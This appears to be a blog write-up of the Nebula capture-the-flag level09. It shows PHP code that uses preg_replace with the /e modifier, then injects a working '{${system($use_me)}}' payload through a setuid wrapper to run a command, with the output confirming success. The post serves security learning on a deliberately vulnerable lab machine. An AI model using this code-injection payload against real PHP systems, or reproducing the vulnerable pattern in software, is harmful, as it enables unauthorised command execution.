Level09 provides us with a C setuid wrapper for some vulnerable PHP code.
<?php
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>
As you can see in the code above, the second argument – $use_me – is not used in the code.
After doing some research, multiple sources identified preg_replace() as a dangerous feature that was deprecated in PHP 5.5.0 and removed as of PHP 7.0.0.
This link provided useful information on the feature and even provided an example for exploitation.
Let’s inject our getflag command into the $use_me argument using the exploitation method from the link:
level09@nebula:/home/flag09$ echo '[email {${system($use_me)}}]' > /tmp/useme
level09@nebula:~$ cd /home/flag09/
level09@nebula:/home/flag09$ ./flag09 /tmp/useme getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1
Looks like the injection was successful - we receive the output that indicates getflag was successfully executed.
Share this post
Twitter
Reddit
LinkedIn